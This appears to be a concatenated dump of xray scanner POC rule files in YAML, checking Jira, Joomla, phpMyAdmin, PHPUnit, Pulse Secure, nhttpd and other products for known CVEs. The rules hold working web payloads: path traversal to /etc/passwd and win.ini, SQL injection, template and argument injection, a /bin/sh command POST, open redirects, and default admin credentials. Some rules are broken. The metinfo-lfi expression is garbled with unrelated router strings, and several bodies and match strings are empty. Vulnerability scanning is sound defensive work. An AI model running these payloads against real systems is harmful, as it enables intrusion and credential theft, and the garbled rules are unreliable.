    - https://mp.weixin.qq.com/s/lZcjStsMKz-VeP-KjU2H7g
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jellyfin-file-read-cve-2021-21402.yml:
--------------------------------------------------------------------------------
# Scanner check for Jellyfin CVE-2021-21402 (identifier taken from the rule name).
# A hit means the audio streaming route returned the contents of win.ini for a
# backslash-encoded traversal path.
# NOTE(review): the marker is a Windows win.ini string, so a miss says nothing
# about installations on other operating systems.
name: poc-yaml-jellyfin-file-read-cve-2021-21402
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0()
detail:
  author: Print1n(https://github.com/Print1n)
  links:
    - https://blog.csdn.net/qq_41503511/article/details/116274406
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jenkins-cve-2018-1000600.yml:
--------------------------------------------------------------------------------
# Scanner check for Jenkins CVE-2018-1000600 (identifier taken from the rule name).
# Confirmation is out-of-band: the request passes a scanner-generated callback
# URL as apiUrl, and the rule passes only if that callback is observed.
name: poc-yaml-jenkins-cve-2018-1000600
manual: true
transport: http
set:
  # newReverse() presumably allocates a callback endpoint on the scanner's
  # reverse platform; without one configured this rule cannot confirm a hit.
  reverse: newReverse()
  reverseUrl: reverse.url
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}}
    # Requires HTTP 200 and a callback within the wait(5) window (unit presumably
    # seconds); targets whose egress is filtered will not match.
    expression: response.status == 200 && reverse.wait(5)
expression: r0()
detail:
  author: PickledFish(https://github.com/PickledFish)
  links:
    - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jetty-cve-2021-28164.yml:
--------------------------------------------------------------------------------
# Scanner check for Jetty CVE-2021-28164 (identifier taken from the rule name).
# A hit means the server returned WEB-INF/web.xml for a path containing an
# encoded dot segment.
name: poc-yaml-jetty-cve-2021-28164
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /%2e/WEB-INF/web.xml
      follow_redirects: false
    # NOTE(review): the last condition tests for an empty byte string as shown
    # here, so it cannot narrow the match. The literal looks like it was lost
    # when this page was extracted - restore it from the upstream rule; until
    # then any 200 response typed application/xml may match.
    expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"")
expression: r0()
detail:
  author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
  links:
    - https://www.linuxlz.com/aqld/2309.html
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jira-cve-2019-8442.yml:
--------------------------------------------------------------------------------
# Scanner check for Jira CVE-2019-8442 (identifier taken from the rule name).
# A hit means the webapp's Maven pom.xml under META-INF was served through the
# /s/ resource path, i.e. files meant to be internal are downloadable.
name: poc-yaml-jira-cve-2019-8442
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
    # Requires HTTP 200, an XML content type and the Jira group id in the body.
    # bytes(string(b"...")) converts a byte literal to a string and back.
    expression: response.status == 200 && response.body.bcontains(bytes(string(b"com.atlassian.jira"))) && response.content_type.contains("application/xml")
expression: r0()
detail:
  author: pa55w0rd(www.pa55w0rd.online/)
  links:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8442
  Affected Version: <7.13.4, 8.00-8.0.4, 8.1.0-8.1.1
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jira-cve-2019-8449.yml:
--------------------------------------------------------------------------------
# Scanner check for Jira CVE-2019-8449 (identifier taken from the rule name).
# The request queries the group/user picker REST endpoint for a placeholder
# name; a hit means the endpoint answered with its normal JSON structure.
# As written the request carries no credentials.
name: poc-yaml-jira-cve-2019-8449
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false
    # Requires HTTP 200, a JSON content type, a non-empty X-AREQUESTID header and
    # four field names in the body. The field names are short, common words, so
    # the header and content-type conditions carry most of the specificity.
    expression: response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users")
expression: r0()
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://xz.aliyun.com/t/7219
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jira-cve-2020-14179.yml:
--------------------------------------------------------------------------------
# Scanner check for Jira CVE-2020-14179 (identifier taken from the rule name).
# A hit means the QueryComponent action returned JSON mentioning Jira classes
# to a request that, as written, carries no credentials.
name: poc-yaml-jira-cve-2020-14179
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /secure/QueryComponent!Default.jspa
      follow_redirects: false
    # Redirects are not followed, so a redirect to the login page does not match.
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira")
expression: r0()
detail:
  author: harris2015(https://github.com/harris2015)
  links:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jira-cve-2020-14181.yml:
--------------------------------------------------------------------------------
# Scanner check for Jira CVE-2020-14181 (identifier taken from the rule name).
# The request asks the user-hover action about a random lowercase name; a hit
# means the action processed it and echoed a profile link for that name.
name: poc-yaml-jira-cve-2020-14181
manual: true
transport: http
set:
  # Random 8-letter name: the probe does not depend on any real account name.
  r: randomLowercase(8)
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /secure/ViewUserHover.jspa?username={{r}}
      follow_redirects: false
    # Requires HTTP 200, the profile link built from r, and a Jira marker string.
    expression: response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira"))
expression: r0()
detail:
  author: whwlsfb(https://github.com/whwlsfb)
  links:
    - https://www.tenable.com/cve/CVE-2020-14181
    - https://twitter.com/ptswarm/status/1318914772918767619
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/joomla-cve-2017-8917-sqli.yml:
--------------------------------------------------------------------------------
# Scanner check for Joomla CVE-2017-8917 (identifier taken from the rule name).
# A hit means a database error message containing a computed hash was returned,
# i.e. the list[fullordering] parameter reached the SQL layer.
name: poc-yaml-joomla-cve-2017-8917-sqli
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
    # NOTE(review): the marker is a fixed hex string, presumably the MD5 of the
    # constant in the path (not verified here). Unlike sibling rules that use a
    # random value, a fixed marker can be matched by a cached or static page
    # containing the same string, and no status-code condition is applied.
    expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
expression: r0()
detail:
  links:
    - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/joomla-cve-2018-7314-sql.yml:
--------------------------------------------------------------------------------
# Scanner check for Joomla CVE-2018-7314 (identifier taken from the rule name),
# in the com_prayercenter component named in the path. A hit means the MD5 of a
# random integer came back in the response, i.e. the sessionid parameter
# reached the SQL layer.
name: poc-yaml-joomla-cve-2018-7314-sql
manual: true
transport: http
set:
  # Fresh random value per run, so a static or cached page cannot satisfy the match.
  r1: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X
    # Compares only the first 31 characters of the hash, presumably because the
    # database error message truncates the value. No status-code condition.
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()
detail:
  author: 南方有梦(http://github.com/hackgov)
  links:
    - https://www.exploit-db.com/exploits/44160
  Affected Version: 3.0.2
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/jupyter-notebook-unauthorized-access.yml:
--------------------------------------------------------------------------------
# Scanner check for a Jupyter Notebook whose terminal page is served without a
# password prompt. A hit means the terminal UI loaded for an unauthenticated
# GET; the instance should require a token or password and should not be
# reachable from untrusted networks.
name: poc-yaml-jupyter-notebook-unauthorized-access
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /terminals/3
      follow_redirects: false
    # Requires HTTP 200, the terminal websocket marker, and the absence of the
    # string "Password:".
    # NOTE(review): the probe targets a fixed terminal number; how an open
    # instance without that terminal responds is not shown here, so a miss does
    # not prove the notebook is protected.
    expression: response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:")
expression: r0()
detail:
  author: bufsnake(https://github.com/bufsnake)
  links:
    - https://vulhub.org/#/environments/jupyter/notebook-rce/
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/kafka-manager-unauth.yml:
--------------------------------------------------------------------------------
# Scanner check for a Kafka Manager UI that is served without authentication.
# A hit means the landing page, including its "Add Cluster" control, rendered
# for an unauthenticated GET.
name: poc-yaml-kafka-manager-unauth
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /
      follow_redirects: false
    # NOTE(review): the first two conditions are identical as shown; markup
    # around them may have been lost when this page was extracted. As written
    # the rule reduces to HTTP 200 plus "Kafka Manager" and "Add Cluster".
    expression: response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster")
expression: r0()
detail:
  author: Aquilao(https://github.com/Aquilao)
  links:
    - https://blog.csdn.net/qq_36923426/article/details/111361158
--------------------------------------------------------------------------------
/pocs_yml/xrayFiles/kibana-unauth.yml:
--------------------------------------------------------------------------------
# Scanner check for a Kibana application page that is served without
# authentication. A hit means /app/kibana rendered for an unauthenticated GET.
name: poc-yaml-kibana-unauth
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /app/kibana
      follow_redirects: false
    # NOTE(review): the single body marker looks like a UI class name and may be
    # specific to certain Kibana releases - a miss does not prove the instance
    # requires login.
    expression: response.status == 200 && response.body.bcontains(b".kibanaWelcomeView")
expression: r0()
detail:
  author: Isaac(https://github.com/IsaacQiang)
  links:
    - https://zhuanlan.zhihu.com/p/61215662
-------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kingsoft-v8-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kingsoft-v8-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /inter/ajax.php?cmd=get_user_login_cmd 10 | body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}' 11 | follow_redirects: true 12 | expression: response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") 13 | expression: r0() 14 | detail: 15 | author: B1anda0(https://github.com/B1anda0) 16 | links: 17 | - https://idc.wanyunshuju.com/aqld/2123.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kong-cve-2020-11710-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kong-cve-2020-11710-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: / 10 | expression: response.status == 200 && response.body.bcontains(b"kong_env") 11 | r1: 12 | request: 13 | cache: true 14 | method: GET 15 | path: /status 16 | expression: response.status == 200 && response.body.bcontains(b"kong_db_cache_miss") 17 | expression: r0() && r1() 18 | detail: 19 | author: Loneyer 20 | links: 21 | - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/kubernetes-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kubernetes-unauth 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /api/v1/nodes 10 | expression: 'response.status == 200 && 
response.content_type.contains("application/json") && response.body.bcontains(b"\"kubeletVersion\": \"v") && response.body.bcontains(b"\"containerRuntimeVersion\"")' 11 | expression: r0() 12 | detail: 13 | author: mumu0215(https://github.com/mumu0215) 14 | links: 15 | - http://luckyzmj.cn/posts/15dff4d3.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | manual: true 3 | transport: http 4 | set: 5 | r: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 12 | follow_redirects: false 13 | expression: response.body.bcontains(bytes(md5(string(r)))) 14 | expression: r0() 15 | detail: 16 | author: hanxiansheng26(https://github.com/hanxiansheng26) 17 | links: 18 | - https://www.cnblogs.com/test404/p/7397755.html 19 | Affected Version: maccms8.x 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/metinfo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-file-read 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/thumb.php?dir=http/.....///.....///config/config_db.php 10 | expression: response.status == 200 && response.body.bcontains(b"con_db_pass") && response.body.bcontains(b"con_db_host") && response.body.bcontains(b"con_db_name") 11 | expression: r0() 12 | detail: 13 | author: amos1 14 | links: 15 | - https://www.cnblogs.com/-qing-/p/10889467.html 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 10 | follow_redirects: true 11 | expression: response.body.bcontains(b"Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 12 | expression: r0() 13 | detail: 14 | author: betta(https://github.com/betta-cyber) 15 | links: 16 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nextjs-cve-2017-16877.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /_next/../../../../../../../../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: Loneyer 15 | links: 16 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 17 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 18 | version: <2.4.1 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /../../../../../../../../windows/win.ini 10 | follow_redirects: true 11 | expression: response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 12 | expression: 
r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nhttpd-cve-2019-16278.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nhttpd-cve-2019-16278 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | r2: randomInt(800000000, 1000000000) 7 | rules: 8 | r0: 9 | request: 10 | cache: true 11 | method: POST 12 | path: /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 13 | body: | 14 | echo 15 | echo 16 | expr {{r1}} + {{r2}} 2>&1 17 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 18 | expression: r0() 19 | detail: 20 | author: Loneyer 21 | links: 22 | - https://git.sp0re.sh/sp0re/Nhttpd-exploits 23 | versions: <= 1.9.6 24 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/node-red-dashboard-file-read-cve-2021-3223.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-node-red-dashboard-file-read-cve-2021-3223 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js 10 | expression: response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) 11 | expression: r0() 12 | detail: 13 | author: Print1n(http://print1n.top) 14 | links: 15 | - https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg 16 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/novnc-url-redirection-cve-2021-3654.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-novnc-url-redirection-cve-2021-3654 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | method: GET 8 | path: "/" 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"noVNC") 12 | r1: 13 | request: 14 | method: GET 15 | path: "//baidu.com/%2f.." 16 | follow_redirects: false 17 | expression: | 18 | response.status == 301 && response.headers["location"] == "//baidu.com/%2f../" 19 | expression: r0() && r1() 20 | detail: 21 | author: txf(https://github.com/tangxiaofeng7) 22 | links: 23 | - https://seclists.org/oss-sec/2021/q3/188 24 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/verify 10 | body: username=admin&password=123 11 | follow_redirects: true 12 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 13 | expression: r0() 14 | detail: {} 15 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nsfocus-uts-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /webapi/v1/system/accountmanage/account 10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 12 | expression: r0() 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://blog.csdn.net/DFMASTER/article/details/108547352 17 | 
-------------------------------------------------------------------------------- /pocs_yml/xrayFiles/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /css_parser.php?css=css_parser.php 10 | follow_redirects: false 11 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 12 | expression: r0() 13 | detail: 14 | author: 2357000166(https://github.com/2357000166) 15 | links: 16 | - https://www.exploit-db.com/exploits/40211 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/odoo-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-odoo-file-read 2 | manual: true 3 | transport: http 4 | rules: 5 | linux0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /base_import/static/etc/passwd 10 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 11 | win0: 12 | request: 13 | cache: true 14 | method: GET 15 | path: /base_import/static/c:/windows/win.ini 16 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 17 | expression: win0() || linux0() 18 | detail: 19 | author: amos1 20 | links: 21 | - https://quake.360.cn/quake/#/vulDetail/QH-202006-1954/checked 22 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /getFavicon?host=baidu.com/? 
10 | follow_redirects: false 11 | expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 12 | expression: r0() 13 | detail: 14 | author: su(https://suzzz112113.github.io/#blog) 15 | links: 16 | - https://www.cnvd.org.cn/patchInfo/show/192993 17 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/panabit-gateway-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-gateway-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/userverify.cgi 10 | body: username=admin&password=panabit 11 | expression: response.status == 200 && response.headers["Set-Cookie"].contains("paonline_admin") && response.body.bcontains(b"URL=/index.htm") 12 | expression: r0() 13 | detail: 14 | author: Print1n(https://github.com/Print1n) 15 | links: 16 | - https://max.book118.com/html/2017/0623/117514590.shtm 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/panabit-ixcache-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-panabit-ixcache-default-password 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /login/userverify.cgi 10 | body: username=admin&password=ixcache 11 | expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi") 12 | expression: r0() 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - http://forum.panabit.com/thread-10830-1-1.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/pbootcms-database-file-download.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-pbootcms-database-file-download 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /data/pbootcms.db 10 | follow_redirects: false 11 | expression: response.status == 200 && "^SQLite format 3\\x00\\x10".bmatches(response.body) && response.body.bcontains(b"PbootCMS") 12 | expression: r0() 13 | detail: 14 | author: abcRosexyz(https://github.com/abcRosexyz) 15 | links: 16 | - https://www.cnblogs.com/0daybug/p/12786036.html 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 12 | body: 13 | follow_redirects: false 14 | expression: response.body.bcontains(bytes(md5(string(rand)))) 15 | expression: r0() 16 | detail: 17 | author: 17bdw 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - 
https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: POST 9 | path: /scripts/setup.php 10 | body: action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 11 | follow_redirects: false 12 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 13 | expression: r0() 14 | detail: 15 | author: p0wd3r 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | r1: randomInt(800000000, 1000000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+ 12 | expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 13 | expression: r0() 14 | detail: 15 | author: jinqi 16 | links: 17 | - https://github.com/jinqi520 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: 
/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: hhdaddy 16 | links: 17 | - https://www.cnblogs.com/Spec/p/10718046.html 18 | Affected Version: "1.7" 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/phpunit-cve-2017-9841-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpunit-cve-2017-9841-rce 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(2000000000, 2100000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: POST 11 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 12 | body: 13 | follow_redirects: false 14 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 15 | expression: r0() 16 | detail: 17 | author: p0wd3r,buchixifan 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 20 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/prometheus-url-redirection-cve-2021-29622.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-prometheus-url-redirection-cve-2021-29622 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /new/newhttps:/baidu.com 10 | follow_redirects: false 11 | expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?" 
12 | expression: r0() 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 17 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/pulse-cve-2019-11510.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pulse-cve-2019-11510 2 | manual: true 3 | transport: http 4 | rules: 5 | r0: 6 | request: 7 | cache: true 8 | method: GET 9 | path: /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 10 | follow_redirects: false 11 | expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 12 | expression: r0() 13 | detail: 14 | author: leezp 15 | links: 16 | - https://github.com/jas502n/CVE-2019-11510-1 17 | - https://github.com/projectzeroindia/CVE-2019-11510 18 | Affected Version: 'Pulse Connect Secure: 9.0RX 8.3RX 8.2RX' 19 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | manual: true 3 | transport: http 4 | set: 5 | rand: randomInt(200000000, 210000000) 6 | rules: 7 | r0: 8 | request: 9 | cache: true 10 | method: GET 11 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 12 | expression: response.body.bcontains(bytes(md5(string(rand)))) 13 | expression: r0() 14 | detail: 15 | author: Rexus 16 | links: 17 | - https://www.ld-fcw.com/ 18 | -------------------------------------------------------------------------------- /pocs_yml/xrayFiles/qizhi-fortressaircraft-unauthorized.yml: 
